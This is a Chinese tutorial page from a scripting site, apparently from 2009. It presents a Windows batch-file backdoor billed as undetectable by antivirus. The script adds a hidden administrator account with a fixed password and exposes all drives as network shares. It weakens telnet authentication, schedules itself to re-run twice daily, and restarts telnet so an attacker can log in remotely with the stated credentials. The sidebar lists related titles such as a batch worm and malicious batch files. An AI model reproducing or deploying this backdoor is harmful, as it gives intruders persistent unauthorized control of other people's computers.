当前位置: 首页 > 图文教程 > 脚本技术 > DOS/BAT > 用批处理写的永不被杀的后门

DOS/BAT
自动克隆guest为administrators组的批处理
实现WIN2003 IIS最小权限分配的批处理
用bat操作注册表实现不显示扩展名
关闭IDE通道检测的批处理
取得硬盘数.bat
右键菜单中添加打开MS-DOS的批处理bat
重命名administrator账号的批处理文件
win2000关机命令的批处理bat
在下次启动计算机时会自动关机。重起后恢复正常(“绿色版”)
bat下变量截取实例
恶意批处理.bat
批处理加密.bat
BAT 解 密 工 具
批处理蠕虫bat
批处理实现屏幕炸弹
用批处理制作超大文件
用批处理实现文件备份器V2.3
用wasfile.zip智能批量删除文件
Append打开指定文件夹中的数据文件就象这些文件在当前文件夹中一样
Date命令

DOS/BAT 中的 用批处理写的永不被杀的后门


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 75 ::
收藏到网摘: n/a

代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为xyt,密码为hacker。